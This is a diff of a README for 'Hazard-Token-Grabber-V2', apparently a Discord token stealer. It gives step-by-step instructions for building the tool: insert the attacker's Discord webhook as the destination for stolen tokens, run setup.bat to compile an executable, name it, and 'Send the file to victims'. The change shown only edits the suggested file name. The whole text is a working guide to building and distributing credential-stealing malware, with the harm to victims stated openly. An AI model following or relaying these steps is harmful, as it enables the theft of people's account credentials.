zehxii/Hazard-Token-Grabber-V2/README.md

 1. Install python if you have not already. [(Link Here)](https://www.python.org/)
 2. Replace "WEBHOOK_HERE" with a discord webhook you've created.
 (Keep the quotes around the webhook)
 3. Double Click `setup.bat` and allow it to finish.
 4. A Window will open prompting for a name.
-Put something in such as "Token_Logger.exe" (You can always rename the file later)
+Put something in such as "Token_Logger" (You can always rename the file later)
 5. Send the file to victims. 😈

 ### ⚙・Manually Compiling Source Code